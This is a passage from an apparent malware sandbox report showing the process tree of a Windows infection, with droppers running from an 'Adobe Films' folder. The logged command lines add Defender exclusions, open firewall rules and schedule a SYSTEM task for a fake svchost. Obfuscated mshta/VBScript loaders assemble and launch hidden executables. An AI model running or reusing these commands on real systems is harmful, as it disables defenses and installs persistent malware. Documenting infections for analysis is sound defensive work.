                                                                  • Checks BIOS information in registry
                                                                  • Checks whether UAC is enabled
                                                                  • Suspicious use of SetThreadContext
                                                                  PID:2404
                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 552
                                                                    3⤵
                                                                    • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                    • Program crash
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:4656
                                                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                                                                    3⤵
                                                                      PID:4292
                                                                  • C:\Users\Admin\Pictures\Adobe Films\0vQHfMtSgnhD1jhGkQ4wnLQX.exe
                                                                    "C:\Users\Admin\Pictures\Adobe Films\0vQHfMtSgnhD1jhGkQ4wnLQX.exe"
                                                                    2⤵
                                                                      PID:1548
                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\
                                                                        3⤵
                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                        PID:4764
                                                                      • C:\Windows\System32\netsh.exe
                                                                        "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes
                                                                        3⤵
                                                                          PID:4980
                                                                        • C:\Windows\System\svchost.exe
                                                                          "C:\Windows\System\svchost.exe" formal
                                                                          3⤵
                                                                          • Executes dropped EXE
                                                                          • Drops file in Windows directory
                                                                          PID:3692
                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\
                                                                            4⤵
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            PID:4552
                                                                          • C:\Windows\System32\netsh.exe
                                                                            "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes
                                                                            4⤵
                                                                              PID:5304
                                                                            • C:\Windows\System32\netsh.exe
                                                                              "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes
                                                                              4⤵
                                                                                PID:5188
                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath \\?\C:\Windows \
                                                                                4⤵
                                                                                  PID:1996
                                                                              • C:\Windows\SYSTEM32\schtasks.exe
                                                                                schtasks /create /sc minute /ED "11/02/2024" /mo 7 /tn "Timer" /tr c:\windows\system\svchost.exe /ru SYSTEM
                                                                                3⤵
                                                                                • Creates scheduled task(s)
                                                                                PID:5092
                                                                              • C:\Windows\System32\netsh.exe
                                                                                "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes
                                                                                3⤵
                                                                                  PID:5052
                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath \\?\C:\Windows \
                                                                                  3⤵
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  PID:4900
                                                                                • C:\Windows\System32\Conhost.exe
                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  3⤵
                                                                                    PID:4144
                                                                                • C:\Users\Admin\Pictures\Adobe Films\wpSZzeOp47N8D7VJf502vqyK.exe
                                                                                  "C:\Users\Admin\Pictures\Adobe Films\wpSZzeOp47N8D7VJf502vqyK.exe"
                                                                                  2⤵
                                                                                  • Executes dropped EXE
                                                                                  • Checks BIOS information in registry
                                                                                  • Checks whether UAC is enabled
                                                                                  • Suspicious use of SetThreadContext
                                                                                  PID:2388
                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 2388 -s 556
                                                                                    3⤵
                                                                                    • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                    • Program crash
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    PID:4704
                                                                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                                                                                    3⤵
                                                                                      PID:4364
                                                                                  • C:\Users\Admin\Pictures\Adobe Films\vnQmfircbg5PUmz8TJVhvuaj.exe
                                                                                    "C:\Users\Admin\Pictures\Adobe Films\vnQmfircbg5PUmz8TJVhvuaj.exe"
                                                                                    2⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:1696
                                                                                    • C:\Users\Admin\Pictures\Adobe Films\vnQmfircbg5PUmz8TJVhvuaj.exe
                                                                                      "C:\Users\Admin\Pictures\Adobe Films\vnQmfircbg5PUmz8TJVhvuaj.exe"
                                                                                      3⤵
                                                                                      • Executes dropped EXE
                                                                                      • Modifies data under HKEY_USERS
                                                                                      PID:6928
                                                                                  • C:\Users\Admin\Pictures\Adobe Films\6lqqmt0sjMwmlXJGE_srz2EE.exe
                                                                                    "C:\Users\Admin\Pictures\Adobe Films\6lqqmt0sjMwmlXJGE_srz2EE.exe"
                                                                                    2⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:2288
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 2288 -s 664
                                                                                      3⤵
                                                                                      • Program crash
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      PID:4548
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 2288 -s 688
                                                                                      3⤵
                                                                                      • Program crash
                                                                                      PID:3952
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 2288 -s 680
                                                                                      3⤵
                                                                                      • Program crash
                                                                                      PID:4436
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 2288 -s 664
                                                                                      3⤵
                                                                                      • Program crash
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      PID:4380
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 2288 -s 1168
                                                                                      3⤵
                                                                                      • Program crash
                                                                                      PID:5952
                                                                                  • C:\Users\Admin\Pictures\Adobe Films\gW1lUa3KSppRc3yuOmAwWytF.exe
                                                                                    "C:\Users\Admin\Pictures\Adobe Films\gW1lUa3KSppRc3yuOmAwWytF.exe"
                                                                                    2⤵
                                                                                    • Executes dropped EXE
                                                                                    • Checks BIOS information in registry
                                                                                    • Checks whether UAC is enabled
                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                    PID:1676
                                                                                  • C:\Users\Admin\Pictures\Adobe Films\awA4IHXXeExMd57SdGPPRwUF.exe
                                                                                    "C:\Users\Admin\Pictures\Adobe Films\awA4IHXXeExMd57SdGPPRwUF.exe"
                                                                                    2⤵
                                                                                    • Executes dropped EXE
                                                                                    • Loads dropped DLL
                                                                                    • Checks processor information in registry
                                                                                    PID:3216
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      "C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\awA4IHXXeExMd57SdGPPRwUF.exe" & exit
                                                                                      3⤵
                                                                                        PID:5724
                                                                                        • C:\Windows\SysWOW64\timeout.exe
                                                                                          timeout /t 5
                                                                                          4⤵
                                                                                          • Delays execution with timeout.exe
                                                                                          PID:5308
                                                                                    • C:\Users\Admin\Pictures\Adobe Films\ol8MGUQO_u29H95LwNBMmKe9.exe
                                                                                      "C:\Users\Admin\Pictures\Adobe Films\ol8MGUQO_u29H95LwNBMmKe9.exe"
                                                                                      2⤵
                                                                                      • Executes dropped EXE
                                                                                      • Checks BIOS information in registry
                                                                                      • Checks whether UAC is enabled
                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                      PID:2488
                                                                                    • C:\Users\Admin\Pictures\Adobe Films\wuR0hbSkgxpJuTifLGk3rJmX.exe
                                                                                      "C:\Users\Admin\Pictures\Adobe Films\wuR0hbSkgxpJuTifLGk3rJmX.exe"
                                                                                      2⤵
                                                                                      • Executes dropped EXE
                                                                                      • Checks BIOS information in registry
                                                                                      • Checks whether UAC is enabled
                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                      PID:3968
                                                                                    • C:\Users\Admin\Pictures\Adobe Films\JglpXFgv4H8ld1mpFLXCkYLE.exe
                                                                                      "C:\Users\Admin\Pictures\Adobe Films\JglpXFgv4H8ld1mpFLXCkYLE.exe"
                                                                                      2⤵
                                                                                        PID:3908
                                                                                        • C:\Users\Admin\AppData\Roaming\8571272.exe
                                                                                          "C:\Users\Admin\AppData\Roaming\8571272.exe"
                                                                                          3⤵
                                                                                          • Executes dropped EXE
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:3952
                                                                                        • C:\Users\Admin\AppData\Roaming\3532239.exe
                                                                                          "C:\Users\Admin\AppData\Roaming\3532239.exe"
                                                                                          3⤵
                                                                                          • Executes dropped EXE
                                                                                          • Adds Run key to start application
                                                                                          PID:4980
                                                                                          • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                                                                            "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                                                                            4⤵
                                                                                            • Executes dropped EXE
                                                                                            PID:5764
                                                                                        • C:\Users\Admin\AppData\Roaming\4101175.exe
                                                                                          "C:\Users\Admin\AppData\Roaming\4101175.exe"
                                                                                          3⤵
                                                                                          • Executes dropped EXE
                                                                                          • Checks BIOS information in registry
                                                                                          • Checks whether UAC is enabled
                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                          PID:5464
                                                                                        • C:\Users\Admin\AppData\Roaming\7425243.exe
                                                                                          "C:\Users\Admin\AppData\Roaming\7425243.exe"
                                                                                          3⤵
                                                                                          • Executes dropped EXE
                                                                                          • Checks BIOS information in registry
                                                                                          • Checks whether UAC is enabled
                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                          PID:5904
                                                                                        • C:\Users\Admin\AppData\Roaming\4925599.exe
                                                                                          "C:\Users\Admin\AppData\Roaming\4925599.exe"
                                                                                          3⤵
                                                                                          • Executes dropped EXE
                                                                                          • Checks BIOS information in registry
                                                                                          • Checks whether UAC is enabled
                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                          PID:4932
                                                                                        • C:\Users\Admin\AppData\Roaming\2514305.exe
                                                                                          "C:\Users\Admin\AppData\Roaming\2514305.exe"
                                                                                          3⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:5268
                                                                                          • C:\Windows\SysWOW64\mshta.exe
                                                                                            "C:\Windows\System32\mshta.exe" VbscRIpT: cLosE ( cREaTeOBjeCT ( "wsCriPT.sHELl" ). rUN ( "Cmd.exe /q /c Type ""C:\Users\Admin\AppData\Roaming\2514305.exe"" > kSTw_GRvR1eDFi.EXE && StARt kStW_grVR1EDFi.exE /P6l3hjJm2mK1sJpxUmLJ & If """"== """" for %k In ( ""C:\Users\Admin\AppData\Roaming\2514305.exe"" ) do taskkill /F /Im ""%~Nxk"" " , 0 , trUE) )
                                                                                            4⤵
                                                                                            • Checks whether UAC is enabled
                                                                                            PID:3392
                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                              "C:\Windows\System32\cmd.exe" /q /c Type "C:\Users\Admin\AppData\Roaming\2514305.exe"> kSTw_GRvR1eDFi.EXE && StARt kStW_grVR1EDFi.exE /P6l3hjJm2mK1sJpxUmLJ& If ""== "" for %k In ( "C:\Users\Admin\AppData\Roaming\2514305.exe" ) do taskkill /F /Im "%~Nxk"
                                                                                              5⤵
                                                                                                PID:5424
                                                                                                • C:\Users\Admin\AppData\Local\Temp\kSTw_GRvR1eDFi.EXE
                                                                                                  kStW_grVR1EDFi.exE /P6l3hjJm2mK1sJpxUmLJ
                                                                                                  6⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Checks whether UAC is enabled
                                                                                                  PID:5776
                                                                                                  • C:\Windows\SysWOW64\mshta.exe
                                                                                                    "C:\Windows\System32\mshta.exe" VbscRIpT: cLosE ( cREaTeOBjeCT ( "wsCriPT.sHELl" ). rUN ( "Cmd.exe /q /c Type ""C:\Users\Admin\AppData\Local\Temp\kSTw_GRvR1eDFi.EXE"" > kSTw_GRvR1eDFi.EXE && StARt kStW_grVR1EDFi.exE /P6l3hjJm2mK1sJpxUmLJ & If ""/P6l3hjJm2mK1sJpxUmLJ""== """" for %k In ( ""C:\Users\Admin\AppData\Local\Temp\kSTw_GRvR1eDFi.EXE"" ) do taskkill /F /Im ""%~Nxk"" " , 0 , trUE) )
                                                                                                    7⤵
                                                                                                    • Checks whether UAC is enabled
                                                                                                    PID:2036
                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                      "C:\Windows\System32\cmd.exe" /q /c Type "C:\Users\Admin\AppData\Local\Temp\kSTw_GRvR1eDFi.EXE"> kSTw_GRvR1eDFi.EXE && StARt kStW_grVR1EDFi.exE /P6l3hjJm2mK1sJpxUmLJ& If "/P6l3hjJm2mK1sJpxUmLJ"== "" for %k In ( "C:\Users\Admin\AppData\Local\Temp\kSTw_GRvR1eDFi.EXE" ) do taskkill /F /Im "%~Nxk"
                                                                                                      8⤵
                                                                                                        PID:4144
                                                                                                    • C:\Windows\SysWOW64\mshta.exe
                                                                                                      "C:\Windows\System32\mshta.exe" VBscrIPT: cLOSE ( cREATEobjeCt ( "WSCRIPt.SheLL" ). ruN ( "C:\Windows\system32\cmd.exe /q /C echo %DatE%cl1V> 8KyK.ZNp & Echo | sET /P = ""MZ"" > hXUPL.XH & CoPY /b /Y HXUPL.XH + QR7i5Ur.BRU + wZfTO2F9.TkR + 3W6U.X2 + 8Kyk.ZNp GkQ1GTV.ZNM & StArT control .\GKq1GTV.ZnM " , 0 , TrUe ) )
                                                                                                      7⤵
                                                                                                      • Checks whether UAC is enabled
                                                                                                      • Modifies Internet Explorer settings
                                                                                                      PID:684
                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                        "C:\Windows\system32\cmd.exe" /q /C echo ÚtE%cl1V> 8KyK.ZNp & Echo | sET /P = "MZ" >hXUPL.XH & CoPY /b /Y HXUPL.XH +QR7i5Ur.BRU + wZfTO2F9.TkR + 3W6U.X2 + 8Kyk.ZNp GkQ1GTV.ZNM& StArT control .\GKq1GTV.ZnM
                                                                                                        8⤵
                                                                                                          PID:676
                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                            C:\Windows\system32\cmd.exe /S /D /c" Echo "
                                                                                                            9⤵
                                                                                                              PID:5692
                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                              C:\Windows\system32\cmd.exe /S /D /c" sET /P = "MZ" 1>hXUPL.XH"
                                                                                                              9⤵
                                                                                                                PID:5180
                                                                                                              • C:\Windows\SysWOW64\control.exe
                                                                                                                control .\GKq1GTV.ZnM
                                                                                                                9⤵
                                                                                                                  PID:4904
                                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                    "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\GKq1GTV.ZnM
                                                                                                                    10⤵
                                                                                                                    • Loads dropped DLL
                                                                                                                    PID:3792
                                                                                                                    • C:\Windows\system32\RunDll32.exe
                                                                                                                      C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\GKq1GTV.ZnM
                                                                                                                      11⤵
                                                                                                                        PID:5984
                                                                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                          "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\GKq1GTV.ZnM
                                                                                                                          12⤵
                                                                                                                          • Loads dropped DLL
                                                                                                                          PID:4272
                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                              taskkill /F /Im "2514305.exe"
                                                                                                              6⤵
                                                                                                              • Kills process with taskkill
                                                                                                              PID:4724
                                                                                                      • C:\Users\Admin\AppData\Roaming\4896618.exe
                                                                                                        "C:\Users\Admin\AppData\Roaming\4896618.exe"
                                                                                                        3⤵
                                                                                                        • Executes dropped EXE
                                                                                                        PID:5328
                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\uz15kGx9oRZqyGCSSrOFxyJz.exe
                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\uz15kGx9oRZqyGCSSrOFxyJz.exe"
                                                                                                      2⤵
                                                                                                      • Executes dropped EXE
                                                                                                      PID:1204
                                                                                                      • C:\Windows\SysWOW64\mshta.exe
                                                                                                        "C:\Windows\System32\mshta.exe" VBsCRIPt:cLose ( creAteObjecT ("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\Pictures\Adobe Films\uz15kGx9oRZqyGCSSrOFxyJz.exe"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If """"== """" for %K iN ( ""C:\Users\Admin\Pictures\Adobe Films\uz15kGx9oRZqyGCSSrOFxyJz.exe"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )
                                                                                                        3⤵
                                                                                                        • Checks whether UAC is enabled
                                                                                                        • Modifies Internet Explorer settings
                                                                                                        PID:608
                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                          "C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\Pictures\Adobe Films\uz15kGx9oRZqyGCSSrOFxyJz.exe" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If ""== "" for %K iN ( "C:\Users\Admin\Pictures\Adobe Films\uz15kGx9oRZqyGCSSrOFxyJz.exe" ) do taskkill -im "%~NxK" -F
                                                                                                          4⤵
                                                                                                            PID:4604
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\8pWB.eXE
                                                                                                              8pWB.eXe /pO_wtib1KE0hzl7U9_CYP
                                                                                                              5⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Checks whether UAC is enabled
                                                                                                              PID:4244
                                                                                                              • C:\Windows\SysWOW64\mshta.exe
                                                                                                                "C:\Windows\System32\mshta.exe" VBsCRIPt:cLose ( creAteObjecT ("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If ""/pO_wtib1KE0hzl7U9_CYP ""== """" for %K iN ( ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )
                                                                                                                6⤵
                                                                                                                • Checks whether UAC is enabled
                                                                                                                PID:4416
                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                  "C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If "/pO_wtib1KE0hzl7U9_CYP "== "" for %K iN ( "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" ) do taskkill -im "%~NxK" -F
                                                                                                                  7⤵
                                                                                                                    PID:4628
                                                                                                                • C:\Windows\SysWOW64\mshta.exe
                                                                                                                  "C:\Windows\System32\mshta.exe" VbScRIpT: close (crEaTEOBject ( "WSCRIPt.SheLl" ). rUn ( "C:\Windows\system32\cmd.exe /c EcHO | seT /p = ""MZ"" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 + HxU0.m + HR0NM.yl + _AECH.7 + ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY " , 0 , TruE ) )
                                                                                                                  6⤵
                                                                                                                    PID:5136
                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                      "C:\Windows\system32\cmd.exe" /c EcHO | seT /p = "MZ" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 + HxU0.m + HR0NM.yl + _AECH.7 + ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY
                                                                                                                      7⤵
                                                                                                                        PID:1228
                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                          C:\Windows\system32\cmd.exe /S /D /c" EcHO "
                                                                                                                          8⤵
                                                                                                                            PID:1128
                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                            C:\Windows\system32\cmd.exe /S /D /c" seT /p = "MZ" 1>1AQCPNL9.1"
                                                                                                                            8⤵
                                                                                                                              PID:3908
                                                                                                                            • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                              msiexec.exe -y .\N3V4H8H.SXY
                                                                                                                              8⤵
                                                                                                                              • Loads dropped DLL
                                                                                                                              PID:4540
                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                        taskkill -im "uz15kGx9oRZqyGCSSrOFxyJz.exe" -F
                                                                                                                        5⤵
                                                                                                                        • Kills process with taskkill
                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                        PID:5176
                                                                                                                • C:\Users\Admin\Pictures\Adobe Films\IPDIK6bi_hinnUNoDuRLa1MR.exe
                                                                                                                  "C:\Users\Admin\Pictures\Adobe Films\IPDIK6bi_hinnUNoDuRLa1MR.exe"
                                                                                                                  2⤵
                                                                                                                    PID:4852
                                                                                                                    • C:\Users\Admin\AppData\Roaming\Calculator\setup.exe
                                                                                                                      C:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=1
                                                                                                                      3⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      • Loads dropped DLL
                                                                                                                      • Adds Run key to start application
                                                                                                                      PID:6140
                                                                                                                      • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                        "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--cSExK3QD"
                                                                                                                        4⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        • Loads dropped DLL
                                                                                                                        PID:3780
                                                                                                                        • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                          C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x1dc,0x1e0,0x1e4,0x1b8,0x1e8,0x7ffd7e7cdec0,0x7ffd7e7cded0,0x7ffd7e7cdee0
                                                                                                                          5⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Checks whether UAC is enabled
                                                                                                                          PID:3908
                                                                                                                • C:\Users\Admin\Pictures\Adobe Films\HdJq6R9vj5v1SpI6pizuurdq.exe
                                                                                                                  "C:\Users\Admin\Pictures\Adobe Films\HdJq6R9vj5v1SpI6pizuurdq.exe"
                                                                                                                  1⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  PID:4252
                                                                                                                • \??\c:\windows\system32\svchost.exe
                                                                                                                  c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                                  1⤵
                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                  • Modifies registry class
                                                                                                                  PID:4408
                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                    C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                    2⤵
                                                                                                                    • Drops file in System32 directory
                                                                                                                    • Checks processor information in registry
                                                                                                                    • Modifies data under HKEY_USERS
                                                                                                                    • Modifies registry class
                                                                                                                    PID:4376
                                                                                                                • C:\Windows\system32\rundll32.exe
                                                                                                                  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                  1⤵
                                                                                                                  • Process spawned unexpected child process
                                                                                                                  PID:6196
                                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                    rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                    2⤵
                                                                                                                    • Loads dropped DLL
                                                                                                                    • Modifies registry class
                                                                                                                    PID:7136
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\D629.exe
                                                                                                                  C:\Users\Admin\AppData\Local\Temp\D629.exe
                                                                                                                  1⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  • Drops startup file
                                                                                                                  PID:3480
                                                                                                                  • C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe
                                                                                                                    "C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe"
                                                                                                                    2⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    • Suspicious behavior: AddClipboardFormatListener
                                                                                                                    PID:5752
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\2BEC.exe
                                                                                                                  C:\Users\Admin\AppData\Local\Temp\2BEC.exe
                                                                                                                  1⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  PID:6656
                                                                                                                • C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                  C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                  1⤵
                                                                                                                    PID:5136
                                                                                                                  • \??\c:\windows\system32\svchost.exe
                                                                                                                    c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                                                                    1⤵
                                                                                                                      PID:1768
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\8DB4.exe
                                                                                                                      C:\Users\Admin\AppData\Local\Temp\8DB4.exe
                                                                                                                      1⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      PID:3484
                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
                                                                                                                        2⤵
                                                                                                                          PID:5920
                                                                                                                          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                            "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\q1vtvbno\q1vtvbno.cmdline"
                                                                                                                            3⤵
                                                                                                                              PID:1704
                                                                                                                              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESEF17.tmp" "c:\Users\Admin\AppData\Local\Temp\q1vtvbno\CSCA09D533EB981489BA4428BF13C5BBE.TMP"
                                                                                                                                4⤵
                                                                                                                                  PID:4400
                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                                                3⤵
                                                                                                                                  PID:7504
                                                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                    4⤵
                                                                                                                                      PID:7448
                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                                                    3⤵
                                                                                                                                      PID:4792
                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                                                      3⤵
                                                                                                                                        PID:6096
                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                    1⤵
                                                                                                                                    • Drops file in Windows directory
                                                                                                                                    • Modifies Internet Explorer settings
                                                                                                                                    • Modifies registry class
                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                    PID:4444
                                                                                                                                  • C:\Windows\system32\browser_broker.exe
                                                                                                                                    C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                    1⤵
                                                                                                                                    • Modifies Internet Explorer settings
                                                                                                                                    PID:6980
                                                                                                                                  • C:\Windows\system32\msiexec.exe
                                                                                                                                    C:\Windows\system32\msiexec.exe /V
                                                                                                                                    1⤵
                                                                                                                                    • Enumerates connected drives
                                                                                                                                    • Drops file in Program Files directory
                                                                                                                                    • Drops file in Windows directory
                                                                                                                                    • Modifies data under HKEY_USERS
